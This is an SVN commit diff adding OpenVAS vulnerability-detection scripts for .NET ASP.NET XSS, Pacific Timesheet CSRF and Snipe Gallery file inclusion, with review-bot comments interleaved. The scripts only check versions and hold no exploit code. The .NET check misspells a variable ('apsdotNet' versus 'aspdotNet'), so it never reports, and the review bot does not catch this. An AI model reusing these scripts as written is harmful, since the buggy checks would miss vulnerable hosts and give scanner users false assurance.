+dotNet = get_kb_item("dotNet/version");
+if(!dotNet){
+ exit(0);
+}
+
+## Check for Microsoft .NET version less than or equal 3.5
+if(version_is_less_equal(version:dotNet, test_version:"3.5")){
+ security_warning(0);
+}
+
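Review bot: The KB key `dotNet/version` read on L767 (and required on L749) differs in case from `dotNET/install` on L757; as far as I know KB keys are matched literally, so confirm against remote-detect-MSdotNET-version.nasl which spelling it actually sets, otherwise the check exits before reporting. The same key is used in gb_ms_dotnet_xss_vuln.nasl (L852, L870), so one fix covers both. A short header comment naming the detect script that populates these keys would document the dependency beyond the script_dependencies call.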
Property changes on: trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_dotnet_xss_vuln.nasl 2010-06-01 10:13:17Z jun $
+#
+# Microsoft .NET 'ASP.NET' Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801345);
+ script_version("$Revision$:1.0");
+ script_cve_id("CVE-2010-2085");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability");
+ desc = "
+ Overview: The host is running Microsoft .NET and is prone to Cross-Site
+ Scripting Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in the default configuration of 'ASP.NET' it
+ has a value of FALSE for the EnableViewStateMac property when processing the
+ '__VIEWSTATE' parameter.
+
+ Impact:
+ Successful exploitation could allow attackers to conduct cross-site scripting
+ attacks against the form control via the __VIEWSTATE parameter.
+
+ Affected Software/OS:
+ Microsoft .NET version prior to 1.1
+
+ Fix: Upgrade to Microsoft .NET 1.1 or later,
+ For updates refer, http://www.microsoft.com/downloads/details.aspx?displaylang=en
+
+ References:
+ https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt
+ http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_summary("Check the version of Microsoft .NET");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_dependencies("remote-detect-MSdotNET-version.nasl");
+ script_require_ports("Services/www");
+ script_require_keys("dotNET/install", "aspNET/installed", "dotNet/version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+dotNet = get_kb_item("dotNET/install");
+if(!dotNet){
+ exit(0);
+}
+
+apsdotNet = get_kb_item("aspNET/installed");
+if(!aspdotNet){
+ exit(0);
+}
+
+dotNet = get_kb_item("dotNet/version");
+if(!dotNet){
+ exit(0);
+}
+
+## Check for Microsoft .NET version less than 1.1
+if(version_is_less(version:dotNet, test_version:"1.1")){
+ security_warning(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_pacific_timesheet_csrf_vuln.nasl 9340 2010-06-02 18:24:29Z june $
+#
+# Pacific Timesheet Cross-Site Request Forgery Vulnerability
+#
+# Authors:
+# Veerendra G.G <veerendragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800181);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2111");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Pacific Timesheet Cross-Site Request Forgery Vulnerability");
+ desc = "
+ Overview: This host is running Pacific Timesheet and is prone to cross-site
+ request forgery vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to improper validation of user-supplied input.
+ A remote attacker could exploit this vulnerability to perform cross-site
+ request forgery by tricking a logged in administrator into visiting a
+ malicious web site or link to perform unauthorized actions.
+
+ Impact:
+ Successful exploitation will let the attackers to perform unauthorized
+ actions.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Pacific Timesheet version 6.74 build 363.
+
+ Fix: No solution or patch is available as on 7th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.pacifictimesheet.com/
+
+ References:
+ http://secunia.com/advisories/39951
+ http://xforce.iss.net/xforce/xfdb/58934
+ http://cross-site-scripting.blogspot.com/2010/05/pacific-timesheet-674-cross-site.html
+ ";
+
+ script_description(desc);
+ script_summary("Check for the version of Pacific Timesheet");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("gb_pacific_timesheet_detect.nasl");
+ script_require_ports("Services/www", 80, 8080);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+pacificTSPort = get_http_port(default:80);
+if(!pacificTSPort){
+ exit(0);
+}
+
+## Get Pacific Timesheet from KB
+pacificTSVer = get_kb_item("www/" + pacificTSPort + "/pacificTimeSheet/Ver");
+pacificTSVer = eregmatch(pattern:"^(.+) under (/.*)$", string:pacificTSVer);
+
+if(pacificTSVer[1] != NULL)
+{
+ ## Check for version 6.74 build 363.
+ if(version_is_equal(version:pacificTSVer[1], test_version:"6.74.363")) {
+ security_warning(pacificTSPort);
+ }
+}
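Review bot: The exact-match test at `version_is_equal(version:pacificTSVer[1], test_version:"6.74.363")` flags only build 363, yet the description states that no vendor fix exists as of 7 June 2010, so any later build is presumably still affected and would be reported clean; unless the advisory names a fixed build, `version_is_less_equal(version:pacificTSVer[1], test_version:"6.74.363")` is the safer test. The same exact-match pattern appears in gb_snipegallery_remote_file_include_vuln.nasl (`3.1.4` / `3.1.5`, likewise with no fix available), where a `version_is_less_equal` against `3.1.5` would apply. Separately, the KB value is handed to eregmatch without a check; `if(!pacificTSVer) exit(0);` before the match makes the no-detection path explicit, consistent with the port check above, and the Snipe Gallery script would benefit from the same `if(!ver) exit(0);`.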
Property changes on: trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_pacific_timesheet_detect.nasl 9340 2010-06-04 16:50:35Z June $
+#
+# Pacific Timesheet Version Detection
+#
+# Authors:
+# Veerendra GG <veerendragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800180);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("Pacific Timesheet Version Detection");
+ desc = "
+ Overview : This script is detects the installed version of Pacific Timesheet
+ and sets the result in KB.
+ ";
+
+ script_description(desc);
+ script_summary("Set version of Pacific Timesheet in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/www", 80, 8080);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get Pacific Timesheet port
+pacificTSPort = get_http_port(default:80);
+if(!pacificTSPort){
+ pacificTSPort = 80;
+}
+
+## Check Port status
+if(!get_port_state(pacificTSPort)){
+ exit(0);
+}
+
+foreach path (make_list("/", "/timesheet", cgi_dirs()))
+{
+ ## Send the request and Recieve the response
+ sndReq = http_get(item: path + "/about-show.do", port:pacificTSPort);
+ rcvRes = http_send_recv(port:pacificTSPort, data:sndReq);
+
+ ## Confirm application is Pacific Timesheet
+ if(">About Pacific Timesheet<" >< rcvRes)
+ {
+ ## Get Pacific Timesheet Version
+ pacificTSVer = eregmatch(pattern:">Version ([0-9.]+) [Bb][Uu][Ii][Ll][Dd]"+
+ " ([0-9]+)</", string:rcvRes);
+
+ if(pacificTSVer[1] != NULL && pacificTSVer[2] != NULL)
+ {
+ pacificTSVer = pacificTSVer[1] + "." + pacificTSVer[2];
+ set_kb_item(name:"www/" + pacificTSPort + "/pacificTimeSheet/Ver",
+ value:pacificTSVer + " under " + path);
+ security_note(data:"Pacific Timesheet version " + pacificTSVer +
+ " running at location " + path +
+ " was detected on the host", port:pacificTSPort);
+
+ exit(0);
+ }
+ }
+}
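Review bot: The fallback `if(!pacificTSPort){ pacificTSPort = 80; }` silently substitutes port 80 when get_http_port() returns nothing, whereas the other detector in this commit (gb_snipegallery_detect.nasl) and the sibling CSRF check exit(0) in that case; since get_http_port(default:80) already supplies the default the branch is likely dead, and `if(!pacificTSPort){ exit(0); }` would be the consistent choice. http_keepalive.inc is included but the request goes through http_send_recv() from http_func.inc, so either the include is unused or the call should be http_keepalive_send_recv() as in the Snipe Gallery detector. The comment `## Send the request and Recieve the response` misspells "Receive".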
Property changes on: trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,75 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_snipegallery_detect.nasl 9371 2010-06-04 11:11:11Z june $
+#
+# Snipe Gallery Version Detection
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801217);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("Snipe Gallery Version Detection");
+ desc = "
+ Overview: This script finds the running Snipe Gallery version and saves
+ the result in KB.";
+
+ script_description(desc);
+ script_summary("Set the version of Snipe Gallery in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get http port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+foreach dir (make_list("/", "/snipegallery", cgi_dirs()))
+{
+ ## Send and Recieve the response
+ req = http_get(item:string(dir,"/index.php"), port:port);
+ res = http_keepalive_send_recv(port:port, data:req);
+
+ ## Confirm the application and Get version
+ ver = eregmatch(pattern:'>Snipe Gallery v.([0-9].[0-9.]+) +- +Galleries',
+ string:res);
+ if(ver[1])
+ {
+ ## Set Snipe Gallery Version in KB
+ set_kb_item(name:"www/" + port + "/snipegallery", value:ver[1] +
+ " under " + dir);
+ security_note(data:"Snipe Gallery version " + ver[1] +
+ " running at location " + dir +
+ " was detected on the host", port:port);
+ }
+}
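Review bot: The version pattern `'>Snipe Gallery v.([0-9].[0-9.]+) +- +Galleries'` leaves its dots unescaped, so `v.` and the separator inside the capture match any character rather than a literal period; `">Snipe Gallery v\.([0-9]+\.[0-9.]+) +- +Galleries"` pins the intended form, written in a double-quoted string so NASL passes the backslash through to the regex engine. The loop also continues after a successful match, so a host with the application under several paths stores several values under the same KB key while gb_snipegallery_remote_file_include_vuln.nasl reads a single one with get_kb_item(); the Pacific Timesheet detector in this commit exits after its first hit, and an `exit(0);` after security_note() would make the two consistent.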
Property changes on: trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_snipegallery_remote_file_include_vuln.nasl 9371 2010-06-04 11:11:11Z jun $
+#
+# Snipe Gallery 'cfg_admin_path' Multiple Remote File Include Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801218);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2126");
+ script_bugtraq_id(40279);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("Snipe Gallery 'cfg_admin_path' Multiple Remote File Include Vulnerabilities");
+ desc = "
+ Overview: The host is running Snipe Gallery and is prone to multiple remote
+ file include vulnerabilities.
+
+ Vulnerability Insight:
+ The flaw is caused by improper validation of user-supplied input via the
+ 'cfg_admin_path' parameter to index.php, view.php, image.php, search.php,
+ admin/index.php, admin/gallery/index.php, admin/gallery/view.php,
+ admin/gallery/gallery.php, admin/gallery/image.php,and admin/gallery/crop.php
+ that allow the attackers to execute arbitrary PHP code on the web server.
+
+ Impact:
+ Successful exploitation will let the attacker to execute arbitrary PHP code
+ in the context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Snipe Gallery Version 3.1.4 and 3.1.5
+
+ Fix: No solution or patch is available as on 4th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.snipegallery.com/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/58806
+ http://packetstormsecurity.org/1004-exploits/snipegallery-rfi.txt
+ http://eidelweiss-advisories.blogspot.com/2010/04/snipegallery-315-multiple-remote-file.html
+ ";
+
+ script_description(desc);
+ script_summary("Check for the version of Snipe Gallery");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("gb_snipegallery_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+## Get version from KB
+ver = get_kb_item("www/" + port + "/snipegallery");
+snipeVer = eregmatch(pattern:"^(.+) under (/.*)$", string:ver);
+
+if(snipeVer[1])
+{
+ ## Check for Snipe Gallery Version 3.1.4 and 3.1.5
+ if(version_is_equal(version:snipeVer[1], test_version:"3.1.4") ||
+ version_is_equal(version:snipeVer[1], test_version:"3.1.5") ){
+ security_hole(port);
+ }
+}
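Review bot: The description text reported to users has a missing space at `admin/gallery/image.php,and admin/gallery/crop.php`; it should read `admin/gallery/image.php, and admin/gallery/crop.php`. The version comparison and KB-value handling points for this script are raised on gb_pacific_timesheet_csrf_vuln.nasl, which shares the same structure.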
Property changes on: trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision